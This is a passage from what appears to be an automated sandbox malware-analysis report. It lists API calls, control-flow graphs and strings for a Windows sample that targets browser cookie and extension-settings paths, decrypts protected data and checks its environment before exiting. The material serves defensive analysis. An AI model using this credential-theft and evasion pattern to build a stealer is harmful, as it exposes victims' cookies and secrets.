                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(e2#,00233265,G1#,?,?,?,?,?,?,?,?,?,00233147), ref: 00238CCA
                                                  • __aulldiv.LIBCMT ref: 00238CE3
                                                  Strings
                                                  Similarity
                                                  • API ID: InstalledMemoryPhysicallySystem__aulldiv
                                                  • String ID: e2#
                                                  • API String ID: 3833932492-4266325466
                                                  • Opcode ID: 2af1d3b17a37b5c456f073e1125a321b114c821cf87cf284286e2c582e2440c9
                                                  • Instruction ID: 08e2b5bda3e6667a0c31b8d53a608763204717f86446c8abe5e5db8898070684
                                                  • Opcode Fuzzy Hash: 2af1d3b17a37b5c456f073e1125a321b114c821cf87cf284286e2c582e2440c9
                                                  • Instruction Fuzzy Hash: CEE08C78600308B7CB04DFE0DC45B9A777CAB48700F0081A9B908AB280EF71AA11C7E5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 164 233ef0-233f10 VirtualAlloc 165 233f12-233f14 164->165 166 233f16-233f33 VirtualAlloc 164->166 167 233f61-233f62 165->167 168 233f35-233f37 166->168 169 233f39-233f56 VirtualAlloc 166->169 168->167 170 233f58-233f5a 169->170 171 233f5c 169->171 170->167 171->167
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00233D5B,?,00231D86,?), ref: 00233EFE
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00233D5B,?,00231D86,?), ref: 00233F21
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 0bda64f109acfb01d00f4db6a623269a6a1177a51255df4cc77c2c7dcad28a20
                                                  • Instruction ID: d7d83f3499a1cb2aa59dfc10b914a2c9be633b63b130e941872df18ce0969749
                                                  • Opcode Fuzzy Hash: 0bda64f109acfb01d00f4db6a623269a6a1177a51255df4cc77c2c7dcad28a20
                                                  • Instruction Fuzzy Hash: B1F03AB0BA9304EEFB269F21BC9EB1136A49348B16F500420B34EAD5D0F3F4D3509A15

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 173 232bd0-232bf6 174 232c09-232c10 173->174 175 232bf8-232bfd 173->175 176 232c16-232c6b call 2391d0 174->176 177 232cd5-232cdc 174->177 178 232c04 175->178 199 232cc4-232cd0 176->199 200 232c6d-232c74 176->200 180 232ce2-232d06 177->180 181 232d76-232d7d 177->181 182 232da6-232da9 178->182 186 232d29-232d4c call 232060 180->186 187 232d08-232d0f 180->187 183 232d93-232d9a 181->183 184 232d7f-232d83 181->184 183->182 190 232d9c-232d9f 183->190 188 232d91 184->188 189 232d85-232d8a 184->189 197 232d74 186->197 198 232d4e-232d6d 186->198 191 232d11-232d14 187->191 192 232d1b-232d27 call 231ee0 187->192 188->182 189->188 190->182 191->192 192->197 197->182 198->197 199->182 202 232c76-232c7d 200->202 203 232c88-232c92 200->203 202->203 205 232c7f-232c86 202->205 206 232c94-232c96 ExitProcess 203->206 207 232c9c 203->207 205->203 208 232c9e-232ca5 205->208 207->199 209 232cb0-232cba 208->209 210 232ca7-232cae 208->210 209->199 211 232cbc-232cbe ExitProcess 209->211 210->199 210->209
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: ef4b1eb07e4d6d7c6746f7b40be23d2fe5256c1f939be5a6fb88261701f37721
                                                  • Instruction ID: be23e6f4a3b02bb26004b8fbc07497f0df1098a3bc1c98debaa51036225f9b4e
                                                  • Opcode Fuzzy Hash: ef4b1eb07e4d6d7c6746f7b40be23d2fe5256c1f939be5a6fb88261701f37721
                                                  • Instruction Fuzzy Hash: 945129B4910209EFDB18CF94C598FADB7B1BF44304F208599E9056B291C375EE99DF90

                                                  Control-flow Graph

                                                  control_flow_graph 212 238c70-238c96 KiUserCallbackDispatcher GetSystemMetrics
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00238C75
                                                  • GetSystemMetrics.USER32(00000001), ref: 00238C86
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherMetricsSystemUser
                                                  • String ID:
                                                  • API String ID: 365337688-0
                                                  • Opcode ID: a448e2f7bbd3ce2892fbc6d8d3ed6b5cf8c169cf464a3970c693712b8469533e
                                                  • Instruction ID: 6ffc7dd7e15365fb9c74c04652b1c95be68df18adfa22e69a0755c4ce78e42a6
                                                  • Opcode Fuzzy Hash: a448e2f7bbd3ce2892fbc6d8d3ed6b5cf8c169cf464a3970c693712b8469533e
                                                  • Instruction Fuzzy Hash: 02D0C934148308EFD704DF90E80DB94BBA8FB48751F10C176ED8D4A381DAB255458BE2

                                                  Control-flow Graph

                                                  control_flow_graph 213 238b90-238ba8 GetCurrentHwProfileA 214 238bfa-238bfd 213->214 215 238baa-238bb1 213->215 216 238bd3-238bdd 215->216 217 238bb3-238bd1 call 231f10 215->217 216->214 218 238bdf-238bf7 call 231f10 216->218 217->214 218->214
                                                  APIs
                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 00238BA0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CurrentProfile
                                                  • String ID:
                                                  • API String ID: 2104809126-0
                                                  • Opcode ID: a6c110dabd4d0e2e1e8966136b6080e973dceee5c2f19a948de7c2c0b7ce21b1
                                                  • Instruction ID: c208f5679f58f6ccf7c3eb0272f66d8e6195b26247c526df495f11f572a190c2
                                                  • Opcode Fuzzy Hash: a6c110dabd4d0e2e1e8966136b6080e973dceee5c2f19a948de7c2c0b7ce21b1
                                                  • Instruction Fuzzy Hash: E6F0D1F491030AA7CB04CF54D891BBE7B7AEB40308F20C169F9059A245EB309A208B50

                                                  Control-flow Graph

                                                  control_flow_graph 223 232060-232067 224 232069-23206b 223->224 225 23206d-232071 223->225 226 232097-232098 224->226 227 232073-23207f call 231ea0 225->227 228 232081-232091 RtlReAllocateHeap 225->228 227->226 228->226
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c53031a7d12021abf779eec030edc3cb1edfd715134237106ecb01afa2561957
                                                  • Instruction ID: 19c2682aecc942fbc04bf2dc4297f599028738fde7342e04ecf5cf0a187ae55d
                                                  • Opcode Fuzzy Hash: c53031a7d12021abf779eec030edc3cb1edfd715134237106ecb01afa2561957
                                                  • Instruction Fuzzy Hash: B8E048F1520108FFDF049F50E848B6B37A89764755F00C414FA1D4B151D775D96CCB51

                                                  Control-flow Graph

                                                  control_flow_graph 231 231ca0-231caa call 2316e0 234 231cce-231cd0 ExitProcess 231->234 235 231cac-231cb3 call 231e50 231->235 235->234 238 231cb5-231cbc call 233d50 235->238 238->234 241 231cbe-231ccc call 232810 238->241 241->234 244 231cd6-231cd7 241->244
                                                  APIs
                                                  • ExitProcess.KERNEL32 ref: 00231CD0
                                                    • Part of subcall function 00231E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00231CB1,?,00231D86,?), ref: 00231E59
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CreateExitHeapProcess
                                                  • String ID:
                                                  • API String ID: 611137554-0
                                                  • Opcode ID: 8b71b321e8cc12c001119e1243d2e702237fca19a42440812889663098d502e6
                                                  • Instruction ID: 87678e03f0c8d903e1147144b11796789b04ac6f1635a35a191743bd5b1ca990
                                                  • Opcode Fuzzy Hash: 8b71b321e8cc12c001119e1243d2e702237fca19a42440812889663098d502e6
                                                  • Instruction Fuzzy Hash: D8D067F57A070656EA607FB26E0676A368C5E11785F041832BE08C52A2FA16D9318A73

                                                  Control-flow Graph

                                                  control_flow_graph 245 231ee0-231eef 246 231ef1-231f04 RtlFreeHeap 245->246 247 231f07-231f0d 245->247 246->247
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(031B0000,00000000,00000000,01430000), ref: 00231EFE
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 2cf3cc23b52fa8cd2bd757d0380f62abec260e279e5c30cbcd595e17b56e8861
                                                  • Instruction ID: d8bb2103fde9492c903d0aa47876a6f1c9539485999a8ad209adcd505936b04c
                                                  • Opcode Fuzzy Hash: 2cf3cc23b52fa8cd2bd757d0380f62abec260e279e5c30cbcd595e17b56e8861
                                                  • Instruction Fuzzy Hash: 6BE017B051420CFBDB14CF98E948BAA7BF8EB08305F104188FA0C87380E771AE50CB91
                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00231CB1,?,00231D86,?), ref: 00231E59
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CreateHeap
                                                  • String ID:
                                                  • API String ID: 10892065-0
                                                  • Opcode ID: d82cd68404aa0d607e2a3f168770783c54f321fe98235775fc174bda2f956b26
                                                  • Instruction ID: d70c7aa36fd8f3f4c7b528f9280f0ba534aac26646f23e23389ac20a6b0082de
                                                  • Opcode Fuzzy Hash: d82cd68404aa0d607e2a3f168770783c54f321fe98235775fc174bda2f956b26
                                                  • Instruction Fuzzy Hash: 3AD01274674308EBF7215F60BC4DB113694A708755F100421FF4D891E0E3F2A4A04614
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 23054232c5878453c3dd4aeeb02b605cdc47899deb8cd995aecbb1bd938d8b47
                                                  • Instruction ID: 7da24b1a533e1952c20b79e57a53523393917dcf0717824990db4c6d9a264b96
                                                  • Opcode Fuzzy Hash: 23054232c5878453c3dd4aeeb02b605cdc47899deb8cd995aecbb1bd938d8b47
                                                  • Instruction Fuzzy Hash: 75C04C75160208ABDA059F94FD59E6A3B9CA749600F404408B74D4A150DB61E8008750
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 00232E41
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 70aea8c058923b7b33455541fe092385944727e96385bef4663b7afafe0a8afa
                                                  • Instruction ID: 1016e5fbbe6e9411f4b002d43fef9f4a4f0536942812dfc8a9a384b7d478c409
                                                  • Opcode Fuzzy Hash: 70aea8c058923b7b33455541fe092385944727e96385bef4663b7afafe0a8afa
                                                  • Instruction Fuzzy Hash: BA116AB8A20218E7CB04CF44D550AB9B7B5FF58301F208198F9068B381E735DEA5E7A0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 00232AF6
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: f9def1d309bbe82c4a2193db2e465c815e69be1378763dd1f2cbf69eb37bced3
                                                  • Instruction ID: 6228ac7953b012ceb56148db10179e80ee40a05857c033533a499ae552ce37e6
                                                  • Opcode Fuzzy Hash: f9def1d309bbe82c4a2193db2e465c815e69be1378763dd1f2cbf69eb37bced3
                                                  • Instruction Fuzzy Hash: 2A119EB4824329E7CB24DF94D5417BC77B2BF14701F6040A9E9422A681E7B95FA4E391
                                                  APIs
                                                    • Part of subcall function 00231EA0: RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00238D83
                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00238EB1
                                                  • FindClose.KERNEL32(000000FF), ref: 00238EC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Find$File$AllocateCloseFirstHeapNext
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 2963102669-2848263008
                                                  • Opcode ID: 594a852e05b9544dfcfcaed71b4e0483e52a5a8bc4401e73bb2207f642f0024e
                                                  • Instruction ID: 2a2521a6f1033993abfa7b6cc5fed754a6b9766f8d6af91550463342cca9a59f
                                                  • Opcode Fuzzy Hash: 594a852e05b9544dfcfcaed71b4e0483e52a5a8bc4401e73bb2207f642f0024e
                                                  • Instruction Fuzzy Hash: 1941D1F5D10219EBCB14DFA4DD99AAF77B5AF48300F1085A8F9159B281EB349B20DB50
                                                  APIs
                                                  • NtQueryObject.NTDLL(00231593,00000001,?,00000000,00000000), ref: 0023166E
                                                  • NtQueryObject.NTDLL(00231593,00000001,?,00000000,00000000), ref: 00231689
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: ObjectQuery
                                                  • String ID: \Local Extensions Settings\$\Network\Cookies$p+v
                                                  • API String ID: 2748340528-202866110
                                                  • Opcode ID: 08ed9c31da21543be8fa588706bb9e5b53749b59c1f9c44541943a019186a925
                                                  • Instruction ID: f0411b2592cd46858cf99bf76420a93c6d3ce81097f2ba28690a394c4d22592c
                                                  • Opcode Fuzzy Hash: 08ed9c31da21543be8fa588706bb9e5b53749b59c1f9c44541943a019186a925
                                                  • Instruction Fuzzy Hash: DE2196B5A20208BBD704CF91DD42FDE737DAB48705F004096B948D7181E6B1EAE8CF90
                                                  APIs
                                                  • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,002316EB,?,00231CA8,?,00231D86,?), ref: 00231C53
                                                  • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,002316EB,?,00231CA8,?,00231D86,?), ref: 00231C63
                                                  • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,002316EB,?,00231CA8,?,00231D86,?), ref: 00231C6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
                                                  • String ID: `Iu
                                                  • API String ID: 3068283267-3215586153
                                                  • Opcode ID: be7f0e9e3dcd6efa176d59efe705db032ba30c2194381249a6535687e38efbea
                                                  • Instruction ID: fabd89cac5c1c8bcec1e5e6a7c5858c46acc1444068e2f72543b203f715616c3
                                                  • Opcode Fuzzy Hash: be7f0e9e3dcd6efa176d59efe705db032ba30c2194381249a6535687e38efbea
                                                  • Instruction Fuzzy Hash: 69C04C712D830566E6542BF47E0FB153658AB15B07F444465F34E980D19DE254204567
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?2#$?2#
                                                  • API String ID: 0-1139033712
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 00231033
                                                    • Part of subcall function 002332A0: LocalFree.KERNEL32(?), ref: 002333BA
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CryptDataFreeLocalUnprotect
                                                  • String ID:
                                                  • API String ID: 1561624719-0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_
                                                  • String ID: O#$O#
                                                  • API String ID: 1955959516-2094851242